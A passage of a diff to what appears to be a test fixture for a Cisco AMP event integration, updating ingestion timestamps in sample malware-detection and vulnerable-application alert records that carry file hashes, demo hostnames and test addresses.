Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -1916,7 +1988,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898136400Z", + "ingested": "2021-12-14T14:40:37.784990354Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2006,7 +2078,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898142300Z", + "ingested": "2021-12-14T14:40:37.784990836Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2092,7 +2164,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898148100Z", + "ingested": "2021-12-14T14:40:37.784991318Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2178,7 +2250,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898152600Z", + "ingested": "2021-12-14T14:40:37.784992024Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2258,7 +2330,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:32.898157500Z", + "ingested": "2021-12-14T14:40:37.784992530Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}", "code": "1107296279", "kind": "alert", 
@@ -2362,7 +2434,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898162800Z", + "ingested": "2021-12-14T14:40:37.784994722Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2448,7 +2520,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898167100Z", + "ingested": "2021-12-14T14:40:37.784995219Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2534,7 +2606,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898171800Z", + "ingested": "2021-12-14T14:40:37.784995712Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2624,7 +2696,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898175800Z", + "ingested": "2021-12-14T14:40:37.784996213Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2710,7 +2782,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898180800Z", + "ingested": "2021-12-14T14:40:37.784996701Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2796,7 +2868,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898186700Z", + "ingested": "2021-12-14T14:40:37.784997193Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2876,7 +2948,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898192700Z", + "ingested": "2021-12-14T14:40:37.784997751Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2956,7 +3028,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898198600Z", + "ingested": "2021-12-14T14:40:37.784998262Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3036,7 +3108,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898204500Z", + "ingested": "2021-12-14T14:40:37.784998747Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3135,7 +3207,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898210600Z", + "ingested": "2021-12-14T14:40:37.784999382Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "code": "1090519054", "kind": "alert", 
